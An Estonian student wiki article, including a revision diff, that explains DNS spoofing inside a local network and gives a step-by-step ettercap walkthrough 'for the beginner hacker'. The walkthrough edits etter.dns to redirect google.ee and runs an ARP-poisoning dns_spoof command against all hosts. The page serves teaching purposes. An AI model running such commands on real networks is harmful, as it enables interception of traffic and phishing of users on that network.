DNS Spoofing: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Tsiimer (talk | contribs)
No edit summary
Tsiimer (talk | contribs)
No edit summary
Line 14: Line 14:




Et antud rünnet teostada, peab olema hackeril kõigepealt ligipääs ohvri(te) sisevõrku, muidu pole antud rünne teostatav.
Näide (algajale hackerile):
Installeeri ettercap tarkvara (Linux Ubuntu näitel):
<pre>
#apt-get install ettercap
</pre>
(võimalik et tuleb mõned libraryd juurde pookida, kui ei tööta, siis uuri http://ettercap.sourceforge.net)
Otsi ülesse ettercap konfifail - etter.dns (otsimiseks kasuta find’i):
<pre>
find / -name etter.dns -print
</pre>
Peaks asuma kataloogis:
<pre>
/usr/share/ettercap/etter.dns
</pre>
Modifitseeri etter.dns faili.
Etter.dns failis on toodud ühe näitena microsoft.com saidile ümbersuunamine www.linux.org peale ;)
Selle asemel muuda ja suuna kõik google.ee tehavad päringud www.itcollege.ee peale.
(Et teada saada www.itcollege.ee avalikku IP aadressi, siis selleks aitab nt ping !):
<pre>
nano /usr/share/ettercap/etter.dns
</pre>
<pre>
www.google.ee  A  193.40.194.205
</pre>
Nüüd käivita ettercap (root õigustes), eeldates et kasutatav võrguliides on eth0:
<pre>
#ettercap -T -q -i eth0 -P dns_spoof -M arp // //
</pre>
Ettercap käsustik lahti seletatuna:
T = text interface
q = quiet
i = interface
P = plug
M = man in the middle
// // = specify all hosts





Revision as of 22:49, 15 May 2011

DNS Spoofing

Autor: Taavo Siimer (AK31)

Sissejuhatus

DNS Spoofing on laiem mõiste, selle mõiste alla liigitatakse nii sisevõrgu kui avaliku võrgu DNS ründed.

DNS spoofing sisevõrgus

Realiseeritakse ühe sisevõrgu subneti piires Man-In-The-Middle rünnakuna, üldjuhul kasutades selleks Linuxi tarkvara Ettercap või Windows tarkvara Cain. Selleks jälgitakse sisevõrguliiklust ning valitakse ohver või IP vahemik, kelle DNS päringutele vastab hackeri vale DNS arvuti/server millelt saadetakse DNS päringutele vale veebi saidi päring, nt pöördudes google.com poole, suunatakse päringu tegija hoopis teise domeeni peale. Põhiliselt võib selleks ette tulla pangalingi feikimist, suunamist URL’le kus võib mingi trooja ohvri arvutisse ronida jne.

Sisuliselt näeks see välja nii:



Et antud rünnet teostada, peab olema hackeril kõigepealt ligipääs ohvri(te) sisevõrku, muidu pole antud rünne teostatav.


Näide (algajale hackerile): Installeeri ettercap tarkvara (Linux Ubuntu näitel):

#apt-get install ettercap

(võimalik et tuleb mõned libraryd juurde pookida, kui ei tööta, siis uuri http://ettercap.sourceforge.net)

Otsi ülesse ettercap konfifail - etter.dns (otsimiseks kasuta find’i):

find / -name etter.dns -print

Peaks asuma kataloogis:

/usr/share/ettercap/etter.dns

Modifitseeri etter.dns faili. Etter.dns failis on toodud ühe näitena microsoft.com saidile ümbersuunamine www.linux.org peale ;) Selle asemel muuda ja suuna kõik google.ee tehavad päringud www.itcollege.ee peale. (Et teada saada www.itcollege.ee avalikku IP aadressi, siis selleks aitab nt ping !):

nano /usr/share/ettercap/etter.dns
www.google.ee   A  193.40.194.205

Nüüd käivita ettercap (root õigustes), eeldates et kasutatav võrguliides on eth0:

#ettercap -T -q -i eth0 -P dns_spoof -M arp // //

Ettercap käsustik lahti seletatuna: T = text interface q = quiet i = interface P = plug M = man in the middle // // = specify all hosts